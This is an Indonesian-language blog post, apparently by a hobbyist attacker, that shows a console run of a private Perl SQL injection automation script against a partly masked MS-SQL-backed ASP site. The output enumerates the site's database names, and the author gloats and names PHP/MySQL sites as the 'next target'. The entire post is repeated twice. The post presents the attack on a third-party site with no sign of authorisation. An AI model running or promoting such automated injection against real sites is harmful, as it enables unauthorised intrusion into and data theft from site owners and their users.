Lanjutan PenTest SQL Injection against MS-SQL Server
Setelah mengetahui nama-nama tabel beserta kolomnya, maka iseng-iseng kita bisa melihat nama-nama databasenya :
E:\data\sqlperl\baru>sqli_loop_multi.pl -t "http://www.XXXXX.web.id/notice_news_
content.asp?id=" -p 2
*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!
by iko94(iko94@yahoo.com)
www.geocities.com/iko94
use : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "target_path" -p pilihan
contoh : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "http://www.XXXXX.web.id/not
ice_news_content.asp?id=" -p 2
ket :
-t target_path
-p pilihan
pilihan :
0 ==> tidak ada quote di depan injek
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek
*********************************
http://www.XXXXX.web.id/notice_news_content.asp?id=
[+] hasil : 1|master
[+] hasil : 2|tempdb
[+] hasil : 3|model
[+] hasil : 4|msdb
[+] hasil : 5|pubs
[+] hasil : 6|Northwind
[+] hasil : 7|o2jam
gak match lagi
dah selesai
++++++++++++++
dah selesai at E:\data\sqlperl\baru\sqli_loop_multi.pl line 147.
E:\data\sqlperl\baru>
xixixixixixi, wah, baik sekali MS-SQL Server mau memberitahu kita apa saja nama databasenya...
Kendi... skrip-skrip ini hampir mencapai final release (but still PRIVATE) ...
NEXT TARGET : skrip php dengan backend database MySQL...
[+] THX To GOD , for everything...
[EOF]
E:\data\sqlperl\baru>sqli_loop_multi.pl -t "http://www.XXXXX.web.id/notice_news_
content.asp?id=" -p 2
*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!
by iko94(iko94@yahoo.com)
www.geocities.com/iko94
use : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "target_path" -p pilihan
contoh : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "http://www.XXXXX.web.id/not
ice_news_content.asp?id=" -p 2
ket :
-t target_path
-p pilihan
pilihan :
0 ==> tidak ada quote di depan injek
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek
*********************************
http://www.XXXXX.web.id/notice_news_content.asp?id=
[+] hasil : 1|master
[+] hasil : 2|tempdb
[+] hasil : 3|model
[+] hasil : 4|msdb
[+] hasil : 5|pubs
[+] hasil : 6|Northwind
[+] hasil : 7|o2jam
gak match lagi
dah selesai
++++++++++++++
dah selesai at E:\data\sqlperl\baru\sqli_loop_multi.pl line 147.
E:\data\sqlperl\baru>
xixixixixixi, wah, baik sekali MS-SQL Server mau memberitahu kita apa saja nama databasenya...
Kendi... skrip-skrip ini hampir mencapai final release (but still PRIVATE) ...
NEXT TARGET : skrip php dengan backend database MySQL...
[+] THX To GOD , for everything...
[EOF]
posted by iko @ 4:29 PM
0 Comments:
Post a Comment
<< Home